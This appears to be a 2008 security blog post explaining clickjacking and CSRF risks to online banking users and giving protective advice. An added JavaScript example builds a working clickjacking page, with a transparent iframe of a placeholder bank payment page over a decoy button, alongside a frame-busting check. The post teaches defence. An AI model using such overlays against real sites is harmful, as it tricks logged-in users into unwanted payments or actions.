Friday, September 26, 2008

Bad security news, part 2

It looks like clickjacking is not only a real problem, but worse than we thought.
In a nutshell: you visit a malicious web page, and the attacker arranges for your clicks to land somewhere other than where they appear to. The attacker's page loads the target site (your bank, say) in an invisible frame positioned over a visible decoy, so when you click the decoy you are really clicking a button on the hidden page. The problem affects every graphical browser; a text-only browser like lynx, which renders neither frames nor style sheets, is about the only exception. The issue has nothing to do with JavaScript, since frames and style sheets are enough to set it up, so turning JavaScript off in your browser will not help you. It's a consequence of the way browsers have always composed pages from several sites at once, and it cannot be fixed with a simple patch. Once you're on the malicious page, the bad guy can make you click on any link, any button, or anything on the hidden page without you seeing it happen.
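What that overlay looks like in practice, as an added example that is not code from the original post: a script that assembles the attacker's decoy page, hit-tests a click to show where it really lands, and includes the frame-detection check a target site could deploy against it. The bank URL, button positions and frame size are assumed values for illustration.

```javascript
// Added example, not code from the original post: a model of the overlay that
// makes clickjacking work, plus the frame-detection check a target site could
// deploy. Every URL, size and coordinate below is an assumed illustration value.

// Rectangle helper (x, y = top-left corner; w, h = size), all in CSS pixels.
function inside(rect, x, y) {
  return x >= rect.x && x < rect.x + rect.w && y >= rect.y && y < rect.y + rect.h;
}

// The visible decoy the victim wants to click, positioned on the attacker's page.
const DECOY_BUTTON = { x: 200, y: 150, w: 120, h: 30 };

// Where the sensitive control sits inside the target page's own coordinate
// space (assumed here; an attacker measures it on the real site beforehand).
const TARGET_BUTTON = { x: 640, y: 420, w: 120, h: 30 };

// Shift the hidden frame so the target's button lands exactly under the decoy.
function frameOffset(decoy, target) {
  return { left: decoy.x - target.x, top: decoy.y - target.y };
}

// Assemble the attacker's page. The iframe is fully transparent (opacity:0)
// but still receives clicks, and its z-index stacks it above the decoy.
function buildClickjackPage(targetUrl, decoy = DECOY_BUTTON, target = TARGET_BUTTON) {
  const { left, top } = frameOffset(decoy, target);
  const frame = { left, top, width: 1024, height: 768 };
  const html = [
    '<!DOCTYPE html><html><body>',
    `<button style="position:absolute;left:${decoy.x}px;top:${decoy.y}px;` +
      `width:${decoy.w}px;height:${decoy.h}px">Claim your prize</button>`,
    `<iframe src="${targetUrl}" style="position:absolute;left:${left}px;top:${top}px;` +
      `width:${frame.width}px;height:${frame.height}px;opacity:0;z-index:10;border:0">` +
      '</iframe>',
    '</body></html>',
  ].join('\n');
  return { html, frame };
}

// Hit test: which layer receives a click at page coordinates (x, y)? Anything
// inside the frame's rectangle goes to the framed page, translated into that
// page's own coordinates, regardless of what the victim sees underneath.
function clickLandsOn(page, x, y) {
  const f = page.frame;
  if (inside({ x: f.left, y: f.top, w: f.width, h: f.height }, x, y)) {
    return { layer: 'target-frame', x: x - f.left, y: y - f.top };
  }
  return { layer: 'attacker-page', x, y };
}

// The defence a target site could ship at the time: refuse to run inside a
// frame. `win` is a window-like object with `top` and `self` so the check can
// be exercised outside a browser.
function isFramed(win) {
  return win.top !== win.self;
}
// Inline script form of the same check (later shown to be bypassable, so it is
// a speed bump rather than a fix).
const FRAME_BUSTER = 'if (top !== self) { top.location = self.location; }';

function demo() {
  const page = buildClickjackPage('https://bank.example/confirm-payment');
  // The victim clicks the middle of the decoy button...
  const hit = clickLandsOn(page, DECOY_BUTTON.x + 50, DECOY_BUTTON.y + 15);
  // ...and the click arrives inside the target's sensitive button instead.
  return { hit, hitsTargetButton: inside(TARGET_BUTTON, hit.x, hit.y) };
}

console.log(JSON.stringify(demo(), null, 2));
console.log('Frame-busting snippet a target site could include:', FRAME_BUSTER);
```

The decoy never changes the bank's page; it only decides what the victim sees at the spot where the real button has been placed. That is also why disabling JavaScript does nothing here: the page above needs none to work.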
The biggest concern is sites like PayPal, your online bank, or your broker. The attacker doesn't alter the bank's page; it is loaded exactly as the bank serves it, complete with your logged-in session, but hidden under the attacker's own page. What gets replaced is what you see: the button labelled "Submit" (or "Play", or "Close") in front of you is a decoy, and the click goes to whichever real button on the hidden page the attacker lined up beneath it. Slashdot has a good discussion, including the following comment that sums up the situation:
Imagine you're in a car showroom looking at a super-expensive car. It looks great and the price is pretty good. So you tell the dealer you'll take the car. Except when you get in the car, you realize that someone had put a cardboard cutout in front of the car. The car you got in was actually an economy vehicle. Except now it's too late to undo your purchase!

Here's another one: Let's say you've got a bunch of buttons on your dash. Most of them control the radio, but one controls the ejection seat. While you're away, some neighbor kids from MIT think it's funny to come over and rewire the buttons on your radio. Now when you press the button to turn on your radio, you actually get ejected from the car.
Yuck. So, what do you do?

First, while the 2 Simple Rules of Browser Security are still a good idea for general security problems, they don't help here.

Second, clickjacking is closely related to Cross-Site Request Forgery (CSRF): both trick your browser into sending a request to a site you're logged into, on behalf of some other site. That relationship suggests a few things you can do that should noticeably improve your odds:
  • When you're done at your bank or broker, always click their logout button. This ends your session on the server, so a request fired from another site, whether by CSRF or from a clickjacked frame, finds nothing to ride on; the hidden frame just shows a login form. No session, no hijack.
  • Don't have other tabs open when you're on one of these financial sites. The tab itself isn't the danger; the combination is: as long as you're logged in, any untrusted page open in another tab or window can frame the bank's site with your session attached.
  • Sites that put a random, per-request token in the URL or form (for example, something like "random=FUOUOY3273" in the URL) are resistant to CSRF, because a forged request from another site won't carry the right value. Resistant, not necessarily immune, but this is still a win. The random part needs to be different each time you visit (or it isn't random, right?). One caveat: the token does not stop clickjacking, because the hidden frame holds the site's own genuine form, token included, and your own click submits it.
Oh, and Paypal has a reputation for being vulnerable to CSRF attacks. This is a bit of a problem, if you use it (I won't). If you do, monitor your account regularly.

UPDATE 30 SEPTEMBER 2008 20:03: Related article and discussion at Slashdot.
